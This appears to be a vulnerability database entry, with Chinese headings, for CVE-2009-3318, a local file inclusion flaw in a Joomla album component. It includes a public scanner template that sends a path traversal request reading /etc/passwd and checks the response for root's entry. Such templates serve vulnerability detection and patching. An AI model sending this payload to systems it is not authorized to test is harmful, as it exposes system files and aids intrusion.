CVE-2009-3318: Joomla! Roland Breedveld Album 1.14 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Joomla! Roland Breedveld Album | POC: 已公开

漏洞描述

Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.

PoC代码[已公开]

id: CVE-2009-3318

info:
  name: Joomla! Roland Breedveld Album 1.14 - Local File Inclusion
  author: daffainfo
  severity: high
  description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
  impact: |
    The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, data disclosure.
  remediation: |
    Update to the latest version of Joomla! Roland Breedveld Album and apply any available patches or security updates.
  reference:
    - https://www.exploit-db.com/exploits/9706
    - https://nvd.nist.gov/vuln/detail/CVE-2009-3318
    - http://www.exploit-db.com/exploits/9706
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2009-3318
    cwe-id: CWE-22
    epss-score: 0.01442
    epss-percentile: 0.80051
    cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: joomla
    product: joomla
  tags: cve2009,cve,joomla,lfi,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022075c3b9b1cbe6e72089cf145e2e8b19e304e399be8f3a0d38b87402687d50597d022100f6e4c0a3848cb6de144578275032299ecf7ee08f7f97e7bc1122d5a58b0a6650:922c64590222798bb761d5b6d8e72950

相关漏洞推荐